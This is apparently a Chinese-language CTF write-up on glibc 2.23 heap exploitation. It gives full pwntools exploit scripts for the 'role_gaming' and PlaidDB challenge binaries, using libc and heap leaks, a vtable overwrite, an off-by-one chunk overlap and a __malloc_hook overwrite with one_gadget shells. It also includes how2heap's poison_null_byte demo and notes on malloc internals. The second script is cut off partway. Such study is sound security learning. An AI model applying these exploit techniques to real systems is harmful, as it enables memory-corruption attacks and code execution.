然后就是想办法在b所处的0x160这个范围内放上libc地址和heap地址,可以通过先free d,再free b来在fastbin上放上fd,不过这个leak值得注意的是,只能leak fd和同fd一样在堆上地址结尾是8的这一行数据,因为如果填充foot,后面紧跟的就是size,只能通过刚好盖满一个chunk的size,realloc时让chunk shrink 0x10个字节,刚好把fd放在前一个chunk的foot处,此时就可以leak了

当然free d之后,由于d的记录chunk在unsortedbin上,再free b的话就会让b的记录chunk fd指向d的记录chunk,而不是main_arena了,所以free d之后我又申请了一个f,如下:

0x100 0x20 0x100 0x60 0x100 0x60 0x100 0x60 0x100 0x60 0x20
fb1
a a b b c c f e e f

再free b之后在b两个chunk的fd上就既有libc地址又有heap地址了,接下来的操作就只是修改和输出:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
new('a'*0x18)
new('b'*0x50)
new('c'*0x50)
new('d'*0x50)
new('e'*0x50)

delete('B'+'d'*0x50)
new('f'*0x18)


change('B'+'a'*0x17+'\x01','a'*0x18+'\x61')
delete('B'+'b'*0x50)

###extend a to get libc_base
change('a'*0x18+'\x61','A'*0x20)

p.recvuntil('successfully\n')
p.sendline('print all')
p.recvuntil('A'*0x20)
libc_base=my_u64(p.recv(6))-0x3c4b78
log.info("\033[1;36m" + 'libc_base:'+hex(libc_base) + "\033[0m")


####extend a to get heap_base
change('A'*0x20,'*'*(0x40+0xe0)+'\xff')#low 1 byte don't care for piebase

p.recvuntil('successfully\n')
p.sendline('print all')
p.recvuntil('\xff')
heap_base=(my_u64(p.recv(5))<<8)-0x12500
log.info("\033[1;36m" + 'heap_base:'+hex(heap_base) + "\033[0m")

leak之后,因为fastbin attack实现不了,所以我的卡了很久,最后随便翻了一下别人的思路,知道了在堆上修改vtable这种操作,但是想要覆盖到下一个chunk去修改vtable,用前面free modified chunk的方法,我在记录chunk根本找不到合适的作为fakesize的字段,只有一个字节的overflow当然也不允许我们修改过多,于是决定试试malloc modified chunk

前面用来leak的构造我就没管了,直接在后面新开一块出来用于覆盖vtable,接着我就申请了g、h、以及一个伪造vtable的i,i的personnage块上我填了一个one_gadget的值,毕竟输入6个字节的地址还是可以的

0x100 0x60 0x20 0x100 0x30 0x100 0x30 0x100 0x20
one_gadget
e e f g g h h i i

先free掉g,然后利用f修改g的size为0x150,再change h为0x140+p64(fake vtable)即可malloc到g+h前面0x18字节的chunk,刚好可以修改h的vtable,这里其实我发现前面的构造也不一定要申请f,直接change一个说不定就可以了

修改之后print all即可调用

完整EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
# -*- coding: utf-8 -*-
from __future__ import print_function
from pwn import *

binary = './role_gaming' #binary's name here
context.binary = binary #context here
context.log_level='debug'
pty = process.PTY
p = process(binary, aslr = 1, stdin=pty, stdout=pty) #process option here
'''
Host =
Port =
p = remote(Host,Port)
'''
elf = ELF(binary)
libc = elf.libc

my_u64 = lambda x: u64(x.ljust(8, '\0'))
my_u32 = lambda x: u32(x.ljust(4, '\0'))
ub_offset = 0x3c4b30
codebase = 0x555555554000
#log.info("\033[1;36m" + hex(bin_addr) + "\033[0m")

# todo here
def new(name):
p.recvuntil('>')
p.sendline('new barbarian '+name)

def delete(name):
p.recvuntil('>')
p.sendline('delete '+name)

def change(nameo,namen):
p.recvuntil('>')
p.sendline('change '+nameo+' '+namen)

new('a'*0x18)
new('b'*0x50)
new('c'*0x50)
new('d'*0x50)
new('e'*0x50)

delete('B'+'d'*0x50)
new('f'*0x18)


change('B'+'a'*0x17+'\x01','a'*0x18+'\x61')
delete('B'+'b'*0x50)

###extend a to get libc_base
change('a'*0x18+'\x61','A'*0x20)

p.recvuntil('successfully\n')
p.sendline('print all')
p.recvuntil('A'*0x20)
libc_base=my_u64(p.recv(6))-0x3c4b78
log.info("\033[1;36m" + 'libc_base:'+hex(libc_base) + "\033[0m")


####extend a to get heap_base
change('A'*0x20,'*'*(0x40+0xe0)+'\xff')

p.recvuntil('successfully\n')
p.sendline('print all')
p.recvuntil('\xff')
heap_base=(my_u64(p.recv(5))<<8)-0x12500
log.info("\033[1;36m" + 'heap_base:'+hex(heap_base) + "\033[0m")
####extend a to get heap_base
'''
0x45216 execve("/bin/sh", rsp+0x30, environ)constraints: rax == NULL
0x4526a execve("/bin/sh", rsp+0x30, environ)constraints: [rsp+0x30] == NULL
0xf02a4 execve("/bin/sh", rsp+0x50, environ)constraints: [rsp+0x50] == NULL
0xf1147 execve("/bin/sh", rsp+0x70, environ)constraints: [rsp+0x70] == NULL
'''
new('g'*0x30)
new('h'*0x30)
new('xxxxxxx'+p64(libc_base+0xf02a4))
delete('B'+'g'*0x50)

change('B'+'f'*0x17+'\x01','F'*0x18+'\x51')
change('B'+'h'*0x30,'+'*0x140+p64(heap_base+0x12b28))
p.sendline('print all')

p.interactive()

how2heap - poison_null_byte&plaiddb

ubuntu16.04 libc2.23

poison_null_byte.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <malloc.h>


int main()
{
fprintf(stderr, "Welcome to poison null byte 2.0!\n");
fprintf(stderr, "Tested in Ubuntu 14.04 64bit.\n");
fprintf(stderr, "This technique only works with disabled tcache-option for glibc, see build_glibc.sh for build instructions.\n");
fprintf(stderr, "This technique can be used when you have an off-by-one into a malloc'ed region with a null byte.\n");

uint8_t* a;
uint8_t* b;
uint8_t* c;
uint8_t* b1;
uint8_t* b2;
uint8_t* d;
void *barrier;

fprintf(stderr, "We allocate 0x100 bytes for 'a'.\n");
a = (uint8_t*) malloc(0x100);
fprintf(stderr, "a: %p\n", a);
int real_a_size = malloc_usable_size(a);
fprintf(stderr, "Since we want to overflow 'a', we need to know the 'real' size of 'a' "
"(it may be more than 0x100 because of rounding): %#x\n", real_a_size);

/* chunk size attribute cannot have a least significant byte with a value of 0x00.
* the least significant byte of this will be 0x10, because the size of the chunk includes
* the amount requested plus some amount required for the metadata. */
b = (uint8_t*) malloc(0x200);

fprintf(stderr, "b: %p\n", b);

c = (uint8_t*) malloc(0x100);
fprintf(stderr, "c: %p\n", c);

barrier = malloc(0x100);
fprintf(stderr, "We allocate a barrier at %p, so that c is not consolidated with the top-chunk when freed.\n"
"The barrier is not strictly necessary, but makes things less confusing\n", barrier);

uint64_t* b_size_ptr = (uint64_t*)(b - 8);

// added fix for size==prev_size(next_chunk) check in newer versions of glibc
// https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=17f487b7afa7cd6c316040f3e6c86dc96b2eec30
// this added check requires we are allowed to have null pointers in b (not just a c string)
//*(size_t*)(b+0x1f0) = 0x200;
fprintf(stderr, "In newer versions of glibc we will need to have our updated size inside b itself to pass "
"the check 'chunksize(P) != prev_size (next_chunk(P))'\n");
// we set this location to 0x200 since 0x200 == (0x211 & 0xff00)
// which is the value of b.size after its first byte has been overwritten with a NULL byte
*(size_t*)(b+0x1f0) = 0x200;

// this technique works by overwriting the size metadata of a free chunk
free(b);

fprintf(stderr, "b.size: %#lx\n", *b_size_ptr);
fprintf(stderr, "b.size is: (0x200 + 0x10) | prev_in_use\n");
fprintf(stderr, "We overflow 'a' with a single null byte into the metadata of 'b'\n");
a[real_a_size] = 0; // <--- THIS IS THE "EXPLOITED BUG"
fprintf(stderr, "b.size: %#lx\n", *b_size_ptr);

uint64_t* c_prev_size_ptr = ((uint64_t*)c)-2;
fprintf(stderr, "c.prev_size is %#lx\n",*c_prev_size_ptr);

// This malloc will result in a call to unlink on the chunk where b was.
// The added check (commit id: 17f487b), if not properly handled as we did before,
// will detect the heap corruption now.
// The check is this: chunksize(P) != prev_size (next_chunk(P)) where
// P == b-0x10, chunksize(P) == *(b-0x10+0x8) == 0x200 (was 0x210 before the overflow)
// next_chunk(P) == b-0x10+0x200 == b+0x1f0
// prev_size (next_chunk(P)) == *(b+0x1f0) == 0x200
fprintf(stderr, "We will pass the check since chunksize(P) == %#lx == %#lx == prev_size (next_chunk(P))\n",
*((size_t*)(b-0x8)), *(size_t*)(b-0x10 + *((size_t*)(b-0x8))));
b1 = malloc(0x100);

fprintf(stderr, "b1: %p\n",b1);
fprintf(stderr, "Now we malloc 'b1'. It will be placed where 'b' was. "
"At this point c.prev_size should have been updated, but it was not: %#lx\n",*c_prev_size_ptr);
fprintf(stderr, "Interestingly, the updated value of c.prev_size has been written 0x10 bytes "
"before c.prev_size: %lx\n",*(((uint64_t*)c)-4));
fprintf(stderr, "We malloc 'b2', our 'victim' chunk.\n");
// Typically b2 (the victim) will be a structure with valuable pointers that we want to control

b2 = malloc(0x80);
fprintf(stderr, "b2: %p\n",b2);

memset(b2,'B',0x80);
fprintf(stderr, "Current b2 content:\n%s\n",b2);

fprintf(stderr, "Now we free 'b1' and 'c': this will consolidate the chunks 'b1' and 'c' (forgetting about 'b2').\n");

free(b1);
free(c);

fprintf(stderr, "Finally, we allocate 'd', overlapping 'b2'.\n");
d = malloc(0x300);
fprintf(stderr, "d: %p\n",d);

fprintf(stderr, "Now 'd' and 'b2' overlap.\n");
memset(d,'D',0x300);

fprintf(stderr, "New b2 content:\n%s\n",b2);

fprintf(stderr, "Thanks to https://www.contextis.com/resources/white-papers/glibc-adventures-the-forgotten-chunks"
"for the clear explanation of this technique.\n");
}

大致意思如下:程序首先malloc了四个small chunk(这里我写的是实际大小)接着进行如下操作:

0x110(a) 0x210(b) 0x110(c) 0x110(barrier)

  1. 在b chunk的0x200偏移处写上了0x200
  2. free(b),设置c.prev_size=0x210,c.size=0x110(此时b chunk被置入unsorted bin)
  3. 通过a的溢出将b.size由0x211改为0x200
  4. b1=malloc(0x100),将b分割出b1(如果不在之前设置fake prev_size,分割时调用unlink会出错)
  5. b2=malloc(0x80)//victim chunk
  6. free(b1)b1被free之后在下一步free(c)时即可通过unlink的检查FD->bk != P || BK->fd != P
  7. free(c),由于c.prev_size在之前被设置成了0x210,c.size为0x110,所以这个free会将前0x210size的chunk一起合并
  8. d=malloc(0x300),此时d与b2 overlap

debug

debug的时候实在是受不了pwndbg里面heap的非hex显示了,于是自己去改了一下pwndbg的脚本(然后被安利了pwngdb和pwndocker,准备这个题写完就去看看)

在pwndbg/pwndbg/commands目录下的heap.py文件里面,找到malloc_chunk函数,然后替换一下注释掉的那行即可:

1
2
3
4
5
6
#print(header, chunk["value"])
print(header,'{')
print(' prev_size = '+hex(chunk['prev_size']).ljust(15,chr(0x20)),'size = '+hex(chunk['size']))
print(' fd = '+hex(chunk['fd']).ljust(15,chr(0x20)),'bk = '+hex(chunk['bk']))
print(' fd_nextsize = '+hex(chunk['fd_nextsize']).ljust(15,chr(0x20)),'bk_nextsize = '+hex(chunk['bk_nextsize']))
print('}')

gdb.Value object里面的直接打印的话是十进制显示的一些值,看起来没那么方便,自己可以按照喜欢的格式改一下脚本

第3步执行之后:

1581064511575

ps:这里可以看出来pwndbg的heap显示是根据堆上的size偏移来计算chunk地址的,所以修改size之后会出现这种错位的现象

第5步执行之后:

第6步执行之后:

b1会被再次放入unsorted bin当中,此时b1是在正常bin链上,当然也具备unlink检查的条件

ps:注意第7步执行之后,本来是unlink了b1这个堆块,但是free时会把合并后的堆块再放入unsortedbin,所以在gdb下查看第七步执行之后的bins中unsortedbin是没有变的(毕竟b1和b的首地址时一样的)

第8步执行过程

我调试了很久很久,主要是搭了glibc源码的调试环境然后撸了很久的malloc源码

因为在第八步执行前heap上和chunk的情况是这样的:

但是执行之后变成了这样:

小的被分割出来的chunk被放入了smallbins,然后malloc(0x300)返回出来的chunk是合并后0x320字节的chunk,照理来说应该是0x310才对,如果是对0x320的chunk进行了切割,剩下的0x10字节是<MINSIZE的,所以得看分配时是不是发生了哪种fit,最后在撸了源码之后,参考xman师傅发的堆ppt看到了这个(不愧是师傅们的总结,tql),不过师傅们的总结这里,unsorted bin大小满足分配需求、剩余大小<MINSIZE时在我这里似乎并不是直接取,因为我撸源码时,里面判断>MINSIZE不成立时直接就把unsortedbin中最后一个块取下来了。

1581133887238

ps:再就是直接从unsortedbin取chunk要满足上图中未打框的四个条件,这里在第4步malloc(0x100)分割出b1,实际上不是从unsortedbin b直接切出来的,是先把这个chunk放入了对应的smallbins,然后再从smallbins切出来的,剩下的快由于大于MINSIZE,所以再被链入了unsortedbin,此时last_remainder才被初始化(对应剩下的块),看上去b1好像是直接从unsortedbin b直接切出来的实际上不是(所以这里再立个 flag,自己找时间把malloc的全流程稍微详细的写一遍),所以我发现分割之后的两个chunk中fd和bk不一样,如下(last_remainder也在第一次分割chunk后初始化):

1581152010623

如上,首先被链入smallbins

回到第八步,ptmalloc源码分析那本PDF里面也写到了best-fit相关:

此时从对应smallbins中对应下标(0x310->0x31)的下一个下标(0x320->0x32)开始找,这里补一个binmap的知识点

binmap&一些流程

在x64下binmap同样是4个Dword(4*32)

利用binmap找到best-fit chunk的具体代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
for (;;) {
/* Skip rest of block if there are no more set bits in this block. */
if (bit > map || bit == 0) {
do {
if (++block >= BINMAPSIZE) /* out of bins */
goto use_top;
} while ( (map = av->binmap[block]) == 0);
bin = bin_at(av, (block << BINMAPSHIFT));
bit = 1;
//Idx2bit()宏将 idx 指定的位设置为 1,其它位清零, map 表示一个 block(unsigned int)值,如果 bit
//大于 map,意味着 map 为 0,该 block 所对应的所有 bins 中都没有空闲 chunk,于是遍历 binmap 的下一
//个 block,直到找到一个不为 0 的 block 或者遍历完所有的 block。退出循环遍历后,设置 bin 指向 block
//的第一个 bit 对应的 bin,并将 bit 置为 1,表示该 block中 bit 1 对应的 bin,这个 bin 中如果有空闲
//chunk,该 chunk 的大小一定满足要求。

while ((bit & map) == 0) {
bin = next_bin(bin);
bit <<= 1;
assert(bit != 0);
}
//在一个 block 遍历对应的 bin,直到找到一个 bit 不为 0 退出遍历,则该 bit 对于的 bin
//中有空闲 chunk 存在。
victim = last(bin);
}

然后接下来就是一些分配流程

  • 如果 victim 与 bin 链表头指针相同,表示该 bin 中没有空闲 chunk, binmap 中的相应位设置不准确,将 binmap 的相应 bit 位清零, 获取当前 bin 下一个 bin,将 bit 移到下一个 bit位,即乘以 2。
  • 当前 bin 中的最后一个 chunk 满足要求,获取该 chunk 的大小,计算切分出所需 chunk
    后剩余部分的大小,然后将 victim 从 bin 的链表中取出。
    • 如果剩余部分的大小小于 MINSIZE,将整个 chunk 分配给应用层,设置 victim 的状态为inuse,如果当前分配区为非主分配区,设置 victim 的非主分配区标志位。 (这里就是我们0x320的chunk最终被返回的原因)
    • 否则从 victim 中切分出所需的 chunk,剩余部分作为一个新的 chunk 加入到 unsorted bin 中。如果剩余部分 chunk 属于 small bins,将分配区的 last remainder chunk 设置为剩余部分构成的 chunk; 如果剩余部分 chunk 属于 large bins,将剩余部分 chunk 的 chunk size 链表指针设置为 NULL,因为 unsorted bin 中的 chunk 是不排序的,这两个指针无用,必须清零
      • 接着设置 victim 和 remainder 的状态,由于 remainder 为空闲 chunk,所以需要设置该 chunk
        的 foot。

如果以上的分配都没有成功最后就会去寻找top_chunk

这里找到一个ptmalloc简单点的总结:

  1. 在fastbin中寻找有没有对应的chunk
  2. 请求大小为small bin范围,在small bin中寻找有没有对应的chunk
  3. 请求大小为large bin范围,仅调用malloc_consolidate合并fastbin
  4. 在unsorted bin中寻找有没有合适的chunk
  5. 在large bin中寻找有没有合适的chunk
  6. 寻找较大的bin链中有没有合适的chunk
  7. 寻找top_chunk
  8. top_chunk不够用,调用malloc_consolidate合并fastbin
  9. top_chunk不够用,系统调用再次申请内存

原文链接:https://zhuanlan.zhihu.com/p/77316206

plaiddb

程序分析

打开IDA茫茫一片23333,然后自己先去把这个程序跑了一下,了解了一下大致的功能,看能不能先理出一点逆向思路来

暂时理解的大概意思就是:GET是获取一个row的内容,PUT是放入一个新的row,DUMP是打印rows的信息,DEL是删除一个row,EXIT就是退出了。

接下来再来分析代码

因为这个函数里面的运算比较多,而且第一次进去也就是做了一些初始化,所以我就先慢慢分析下面的真正菜单


Two hours later…..


….逆锤子?结果还是要回到sub_CF0??….两百多行的函数配着循环和goto,快把我给逆疯了好嘛….(wtcl…)

我先是逆出了一个结构体的样子(查了wp发现我这个结构体也还稍微有点问题,0x30处的应该是一个leaf or not的flag标识,我刚开始还以为它代表是否为根节点,不过bss段上存的那个变量应该是根节点指针):

1581237156090

是的,我是在里面一次次调试尝试加上静态分析之后才发现这个数据库是用树形结构来实现的,限于数据结构的水平和逆向的代码量….我没有逆出来具体是哪种树,发现是树形结构之后为了不太浪费时间就放弃了逆向…转而查了WP(pwn这边果然是任重而道远啊)

PUT

  • 先申请一个0x40的chunk作为结点
  • 在Enter里面申请一个0x20的chunk存储这个结点的row key
  • 然后再申请一个我们可以控制大小的chunk来存储data
    • 如果申请失败就free掉前两个chunk
  • data chunk申请成功,通过freadn来输入data,并尝试将这个结点加入red-black tree
  • 如果加入失败说明之前有相同的row key,树操作会返回相同row key结点的指针成功则返回0
    • 失败:先free掉前面的row key chunk已有结点的data chunk,接着更新已有结点的data size和data chunk指针,然后free掉前面的申请的结点chunk

DUMP

  • 根据某种遍历方式,打印出所有结点的row key还有对应的data size(这里IDA打印函数的参数识别稍微有点问题)

GET

  • Enter时申请一个row key chunk,然后通过对比找到相应结点
  • 打印相应结点的data chunk内容
  • free掉前面Enter的row key chunk

DEL

茫茫一片的树操作,不过关注点只需要放在chunk的操作上即可

1581258539173

  • Enter一个row key chunk,然后查找对应的结点
    • 找到了:free对应结点的row key chunk和data chunk然后free结点、free Enter的chunk
    • 没找到:直接退出,没有free Enter的chunk

off_by_one

程序存在一个off_by_one,在Enter函数里面

当chunk_ptr_now - chunk_ptr == usable_size时,最后一步操作 *chunk_ptr_now=0会越界赋值0

Exploit

程序的流程是终于捋出来了,但是这个利用好想需要想一想,每次都是几个chunk一起操作(特别是PUT的时候),以前做的利用都比较单一,没有这么复杂。


回想一下前面的poison_null_byte.c

  • free掉两个chunk中间的一个chunk(free之前先设置一个假的prev_size来通过malloc的检查,和之前那篇里面的fake size目的是不一样的,一个是为了通过free的检查一个是为了通过malloc的检查)(free之后第三个chunk的prev_inuse位就为0了)
  • 用第一个chunk的off_by_one来影响第二个chunk的size字段
  • malloc两个小一点的chunk:b1&b2
  • free b1之后free第三个chunk,此时第三个chunk和b2 overlap

那到这个题里面应该怎么利用呢emmm…..把断点下在第一次输入完命令DUMP之后(dump执行完不会影响heap),调试看一下

1581260525230

此时堆中的chunks就是我们前面初始化的第一个结点还有对应的row key chunk和data chunk

在这些chunk里面,结点chunk还有row key chunk都是指定大小的fastchunk,只有data可以为不同的chunk,然后存在漏洞的Enter函数是只被row key chunk调用的,所以off_by_one只发生在row key chunk生成时后面紧跟着的chunk

各处的malloc(初始化之后的)

PUT中的chunk申请顺序:结点 -> row key -> data

GET中只申请了一个row key

DEL中也只有一个row key

各处的free

PUT中:

  • data申请失败会free掉PUT函数中申请的row key chunk和结点chunk
  • 输入的row key已存在时会free PUT函数中申请的row key chunk和已有结点的data chunk,还有前面的结点chunk

GET中无论如何都会free用来查找的row key chunk

DEL中:

  • 找到了:free对应结点的row key chunk、data chunk然后free结点、free Enter的chunk
  • 没找到:直接退出,没有free Enter的chunk

第一思路:

在初始化的基础上,再申请两个节点,此时堆中就会有以下结构

0x40 0x20 0x20 0x40 0x20 0x??? 0x40 0x20 0x??? 0x??????
结点1 row key1 data1 结点2 row key2 data2 结点3 row key3 data3 top_chunk

接着删除第二个结点

0x40 0x20 0x20 0x40 0x20 0x??? 0x40 0x20 0x??? 0x20 0x??????
结点1 row key1 data1 结点2 row key2 data2 结点3 row key3 data3 row key4 top_chunk
fastbin fastbin ?bin fastbin

此时0x20的fastbin中是row key4->row key2

然后通过DEL中没有free Enter chunk,申请两次,从而第二次可以在row key2处对data2造成off_by_one(既然能off_by_one,data2就肯定不是fastchunk了)

但是还有一点,off_by_one发生之后,如果我们的目的是用例子的那种overlap,这是结点3是一个fastchunk,free的时候并不会向前合并,所以这个思路显然不行

ps:然而当我写完后面的再回来看的时候,这里又是我立的一个flag,或者说我当时写到这里的时候还对构造不太熟悉,如果把两个data chunk构造在一起好像也不是不行(只要删掉前面一个结点,就会在fastbin中腾出位置来,再申请一个有大于之前data块的结点就可以了),主要是写后面的构造方法写着写着就忘了前面这个我想到的用DEL填充来off_by_one然后合并前面的chunk的方法,如果用这种方式来构造的话可以这样构造:

0x40 0x20 0x20 0x40 0x20 0xd0 0x40 0x20 0x70 0x40 0x20 0x100 0x40 0x20 0x40
结点1 rowkey1 data1 结点2 rowkey2 data2 结点3 rowkey3 data3 data5 结点5 rowkey5
fastbin2 fastbin1 fastbin2

第二思路:

0x40 0x20 0x20 0x40 0x20 0x??? 0x40 0x20 0x??? 0x??????
结点1 row key1 data1 结点2 row key2 data2 结点3 row key3 data3 top_chunk

还是先产生这样的结构,不过此时row key3是和row key2一样的,主要是想让结点2中的data2改到data3去,然后就会变成这样

0x40 0x20 0x20 0x40 0x20 0x??? 0x40 0x20 0x??? 0x??????
结点1 row key1 data1 结点2 row key2 data2_old 结点3 row key3 data2_n top_chunk
?bin fastbin fastbin

然后接着构造(data3要大过data2_old)

0x40 0x20 0x20 0x40 0x20 0x??? 0x40 0x20 0x?00 0x??? 0x??????
结点1 rowkey1 data1 结点2 rowkey2 data2_old 结点3 rowkey3 data2_n data3 top_chunk
?bin

申请新的结点3,并在此时对data2_n构成off_by_one并写好prev_size

这里之后我去参考了一些wp,发现大家都是用的结构体前面两个成员,row key ptr还有data size进行的leak,而且对应的指针是unsortedbin指针,因为unsortedbin指针的偏移会指向top_chunk,使用这种泄露方式可以同时泄露出libc_base和heap_base,再就是how2heap中这个off_by_one是用来malloc的时候不改变下个chunk的prev_size,但是这个题用off_by_one来free合并前面的chunk似乎更简单一点

接着构造Double free,但是如果想要修改malloc hook之类的地方,我发现我不仅需要一个0x70的fastchunk(参考之前写的babyheap),还需要一个smallbin合并时用来unlink,所以得回去再重新加上(当然此时的chunk链结构就又发生了变化,保证data2_n被free时能合并前面的chunk,而且0x70chunk必须在这个smallbin之后)

计算size并更改之后:

0x40 0x20 0x20 0x40 0x20 0x90
结点1 rowkey1 data1_n
fastbin fastbin fastbin

然后一步步构造之前构造过的

0x40 0x20 0x20 0x40 0x20 0x90 0x40
结点1 rowkey1 rowkey2 结点2 data1_n data2
fastbin

然后把data2后面造成一个结点为了0x90+0x40的chunk被分割之后直接DUMP leak

0x40 0x20 0x20 0x40 0x20 0x90 0x40 0x40 0x70
结点1 rowkey1 rowkey2 结点2 data1_n data2 data2_n
fastbin fastbin fastbin
0x40 0x20 0x20 0x40 0x20 0x90 0x40 0x40 0x70
结点1 rowkey1 rowkey2 结点2 rowkey3 data1_n data3 结点3 data2_n

开始构造off_by_one

0x40 0x20 0x20 0x40 0x20 0x90 0x40 0x40 0x70 0x40 0x20 0x60
结点1 rowkey1 rowkey2 结点2 rowkey3 data1_n data3 结点3 data2_nn
fastbin fastbin fastbin
0x40 0x20 0x20 0x40 0x20 0x90 0x40 0x40 0x70 0x40 0x20 0x60 0x60
结点1 rowkey1 rowkey2 结点2 rowkey3 data1_n data3 结点3 结点4 rowkey4 data2_nn data4
fastbin
0x40 0x20 0x20 0x40 0x20 0x90 0x40 0x40 0x70 0x40 0x20 0x60 0x60 0x40 0x20 0x110
结点1 rowkey1 rowkey2 结点2 rowkey3 data1_n data3 结点3 结点4 rowkey4 data2_nn data4_n
fastbin fastbin fastbin fastbin

终于具备漏洞利用的条件了

再添加一个结点5trigger off_by_one

0x40 0x20 0x20 0x40 0x20 0x90 0x40 0x40 0x70 0x40 0x20 0x60 0x60 0x40 0x20 0x110
结点1 rowkey1 rowkey2 结点2 rowkey3 data1_n data3 结点3 结点4 rowkey4 data2_nn data5 结点5 rowkey5 data4_n
fastbin

删掉结点2、1、4(这里我调试之后回来2删了,否则后面树操作好像会出错,>>>…<<<中间的是unsorted chunk)

0x40 0x20 0x20 0x40 0x20 0x90 0x40 0x40 0x70 0x40 0x20 0x60 0x60 0x40 0x20 0x110 0x20
rowkey3 data3 结点3 data5 结点5 rowkey5 data4_n
fastbin fastbin fastbin fastbin >>> fastbin fastbin fastbin fastbin <<< fastbin

然后申请一个data为0xD0的块a,但是由于我申请的大小太玄学了…top_chunk结尾刚好是\x00,打印会失败,所以我又更改了data5的大小,然后就可以成功leak了,此时的堆应该是这样(这里我把同大小的fastchunk在fastbin链表上的位置通过调试标出来了最先被malloc出去的数字最大,方便后面的制表):

0x40 0x20 0x20 0x40 0x20 0x90 0x40 0x40 0x70 0x40 0x20 0x60 0x60 0x40 0x20 0x110 0x20 0x110
rowkey3 (a data) data3(a data) 结点3 结点a 结点5 rowkey5 data4_n rowkey a data5_n
fastbin2 fastbin2 fastbin1 fastbin1 >>> fastbin1 fastbin3 fastbin2 fastbin1 <<<

leak之后我们再申请一个data size为0xB0的chunk b,就刚好把接下来0x70和0x40这个chunk重复利用了,而0x70这个chunk在fastbin里面,只要把他的fd改到__malloc_hook上方即可(具体位置见之前写的的babyheap)

不过至于具体的data填充操作我调试了很久很久,稍不注意就会在各种地方出错,建议直接把内存全部打印出来然后照着上面的填进去,这样比较好

0x40 0x20 0x20 0x40 0x20 0x90 0x40 0x40 0x70 0x40 0x20 0x60 0x60 0x40 0x20 0x110 0x20 0x110
结点b rowkey3 (a data) data3(a data) 结点3(data b) (data b) 结点a rowkeyb 结点5 rowkey5 data4_n rowkey a data5_n
fastbin2 fastbin1 fastbin1 fastbin1 >>> fastbin2 fastbin1 <<<

然后我们在申请一个没有意义的c(data为0x70的fastchunk),只是为了下一次能把__malloc_hook那块内存给malloc出来

0x40 0x20 0x20 0x40 0x20 0x90 0x40 0x40 0x70 0x40 0x20 0x60 0x60 0x40 0x20 0x110 0x20 0x110
结点b rowkey c 结点c rowkey3 (a data) data3(a data) 结点3(data b) (data b)(data c) 结点a rowkeyb 结点5 rowkey5 data4_n rowkey a data5_n
fastbin1 >>> fastbin2 fastbin1 <<<

这里好像再进行申请时会出错,我删结点5好像也删不掉(显示notfound,可能是因为a被unsortedbin指针破坏,然后树结构改变了的原因),本来以为到这里就会嗝屁失败了,但是b被我成功删掉了(这可能就是玄学吧XD,希望以后不要有这种情况)

然后malloc一个0x70的chunk修改__malloc_hook

不过在PUT里面的malloc触发one_gadget死活不成功,本来以为又要嗝屁了55555,结果在我坚持尝试的努力下,在DEL中成功将one_gadget触发成功

完整EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
# -*- coding: utf-8 -*-
from __future__ import print_function
from pwn import *

binary = 'PlaidDB' #binary's name here
context.binary = binary #context here
context.log_level='debug'
pty = process.PTY
p = process(binary, aslr = 1, stdin=pty, stdout=pty) #process option here
'''
Host =
Port =
p = remote(Host,Port)
'''
elf = ELF(binary)
libc = elf.libc

my_u64 = lambda x: u64(x.ljust(8, '\0'))
my_u32 = lambda x: u32(x.ljust(4, '\0'))
ub_offset = 0x3c4b30
codebase = 0x555555554000
#log.info("\033[1;36m" + hex(bin_addr) + "\033[0m")

# todo here
def GET(key):
p.recvuntil('Enter command:\n')
p.sendline("GET")
p.recvline("PROMPT: Enter row key:")
p.sendline(key)

def PUT(key, size, data):
p.recvuntil('Enter command:\n')
p.sendline("PUT")
p.recvline("PROMPT: Enter row key:")
p.sendline(key)
p.recvline("PROMPT: Enter data size:")
p.sendline(str(size))
p.recvline("PROMPT: Enter data:")
p.send(data)

def DUMP():
p.recvuntil('Enter command:\n')
p.sendline("DUMP")

def DEL(key):
p.recvuntil('Enter command:\n')
p.sendline("DEL")
p.recvline("PROMPT: Enter row key:")
p.sendline(key)

PUT("th3fl4g", 0x88, '\x00'*0x88)
PUT("2222222", 0x38, '\x00'*0x38)
PUT("2222222", 0x68, '\x00'*0x68)
PUT("3333333", 0x38, '\x00'*0x38)
PUT("2222222", 0x58, '\x00'*0x58)
PUT('4444444', 0x58, '\x00'*0x58)
PUT('4444444', 0xf8, '\x00'*0xf8)
PUT('5'*0x10+p64(0x300), 0x108, '\x00'*0x108)

DEL('2222222')
DEL('th3fl4g')
DEL('4444444')

gdb.attach(p,'brva 0x1334')
PUT('a', 0xc8, '\x00'*0xc8)#D0 chunk

DUMP()
#p.recvuntil('bytes')
p.recvuntil('[')
heap_base=my_u64(p.recv(6))-0x610
p.recvuntil(', ')
libc_base=int(p.recvuntil(' '))-0x3c4b78
log.info("\033[1;36m" + hex(heap_base)+','+hex(libc_base) + "\033[0m")

fill1=p64(0)*2+p64(heap_base+0x180)+p64(0)*2+p64(heap_base+0x390)+p64(0)+p64(0x71)+p64(libc_base+0x3c4aed)+p64(0)*12
PUT('b',0xa8,fill1)

